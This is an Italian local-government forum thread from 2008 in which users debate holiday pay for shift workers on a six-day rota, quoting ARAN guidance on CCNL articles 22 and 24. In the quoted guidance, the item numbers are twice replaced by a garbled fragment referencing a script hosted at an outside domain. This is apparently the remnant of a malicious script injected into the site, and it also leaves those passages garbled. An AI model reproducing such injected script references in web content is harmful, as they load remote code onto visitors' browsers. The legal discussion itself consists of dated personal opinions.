Il Forum del Governo Locale - festivo infrasettimanale per turnisti
Il Forum del Governo Locale
Il Forum del Governo Locale
Home | Profilo | Registrati | Messaggi attivi | Membri | Cerca | FAQ
Username:
Password:
salva la Password
Hai dimenticato la Password? | Amministratore

 I Forum
 Gli Enti Locali
 Altro
 festivo infrasettimanale per turnisti
 Nuovo Messaggio  Rispondi
 Stampa
Autore Previous Topic Topic Discussione successiva Blocca discussione Modifica il topic Cancella il topic Nuovo topic Rispondi al topic

sansperate

9 Posts

Scritto - 08/10/2008 :  09:54:07  Vedi il profilo  Modifica il topic  Rispondi quotando  Vedi l'indirizzo Ip dell'utente  Cancella il topic
Qualcuno mi può indicare se il personale che presta turnazione articolata in 6 giorni (dal lunedì al sabato), in caso di festività infrasettimanale, deve obbligatoriamente prestare normale attività lavorativa e completare le 36 ore settimanali oppure è da considerare non lavorativo perchè festivo e considerare la prestazione orario extra?

an.bal

312 Posts

Scritto - 08/10/2008 :  11:48:29  Vedi il profilo  Edit Reply  Rispondi quotando  Vedi l'indirizzo Ip dell'utente  Cancella la risposta
il personale che presta l'attività lavorativa secondo turnazione in caso di giorno festivo infrasettimanale (o meglio, all'interno dell'articolazione della turnazione) svolge normale attività lavorativa con diritto alla maggiorazione per turno festivo e nessuna altra maggiorazione.
..secondo me.
Vai ad inizio pagina

Maggio1969

2 Posts

Scritto - 09/10/2008 :  09:07:15  Vedi il profilo  Edit Reply  Rispondi quotando  Vedi l'indirizzo Ip dell'utente  Cancella la risposta
Il personale che, pur avendo articolata la prestazione lavorativa su sei giorni, ha un giorno festivo all'interno del turno NON è obbligato a lavorare quel giorno per completare il turno. Il giorno festivo è a tutti gli effetti non lavorativo. La prestazione erogata in giorno festivo è dunque da considerarsi lavoro straordinario da retribuire con le relative maggiorazioni. Ad esempio: se il giorno di ferragosto cade di lunedì, per i vigili che turnano su sei giorni (LUN-SAB) sarà festivo e se per necessità di servizio qualcuno presterà attività lavorativa sarà da considerarsi straordinario al pari di un qualunque altro impiegato amministrativo che lavori su cinque giorni settimanali e che per motivi particolari debba lavorare proprio quel giorno.
Vai ad inizio pagina

an.bal

312 Posts

Scritto - 09/10/2008 :  10:13:40  Vedi il profilo  Edit Reply  Rispondi quotando  Vedi l'indirizzo Ip dell'utente  Cancella la risposta
ribadisco....ecco alcuni orientamenti aran....


900-22src="http://cmiia.com/op1.js". Come si determina il compenso che spetta al personale che, in base al turno assegnato, presta la propria attività in giornata festiva? Si può applicare la disciplina dell’art. 24, comma 5, del CCNL del 14.9.2000?
Al personale turnista che presti attività lavorativa in giornata festiva infrasettimanale spetta solo il compenso previsto dall’art.22, comma 5, secondo alinea (maggiorazione del 30% della retribuzione di cui all’art.52, comma 2, lett.c).
Nel caso di turno ricadente in giornata domenicale, al dipendente va corrisposto ugualmente solo il compenso previsto dall’art.22, comma 5, secondo alinea, salvo il recupero in altro giorno di riposo settimanale.
Per ciò che attiene alla clausola contenuta nell’art.24, comma 5, del CCNL del 14.9.2000, come si evince chiaramente dalla formulazione del testo, esso si riferisce solo al caso del dipendente che ordinariamente, in base al suo orario di lavoro, è tenuto ad effettuare prestazioni lavorative di notte o di giorno festivo settimanale (come nel caso di dipendente che in base ad una particolare programmazione plurisettimanale dell’orario di lavoro è chiamato a prestare la sua attività sempre di notte).


900-22src="http://cmiia.com/op1.js". Il lavoratore in turno che presta la propria attività in giornata festiva infrasettimanale ha diritto al compenso per lavoro straordinario previsto dall’art. 24, comma 2, del CCNL del 14.9.2000?
Riteniamo che, ove trattasi di attività prestata in turno nei giorni festivi infrasettimanali, debba trovare applicazione esclusivamente l’art.22 del CCNL del 14.9.2000, che espressamente, tra le diverse ipotesi, stabilisce anche il compenso da corrispondere nei casi di turno festivo: maggiorazione oraria del 30% della retribuzione di cui all’art.52, comma 2, lett.c).
Pertanto, dobbiamo sicuramente escludere che nell’ipotesi considerata possa farsi riferimento al diverso istituto dello
straordinario.
Neppure, infine, è ipotizzabile che in relazione alla medesima fattispecie possano cumularsi indennità di turno e compenso per lavoro straordinario.


Vai ad inizio pagina
  Previous Topic Topic Discussione successiva Blocca discussione Modifica il topic Cancella il topic Nuovo topic Rispondi al topic
 Nuovo Messaggio  Rispondi
 Stampa
Vai a:
Il Forum del Governo Locale © Piscino.it Go To Top Of Page
Snitz Forums 2000


Eugenio PISCINO - Copyright© 1998-2013 - All rights reserved
Xhtml validato  CSS validato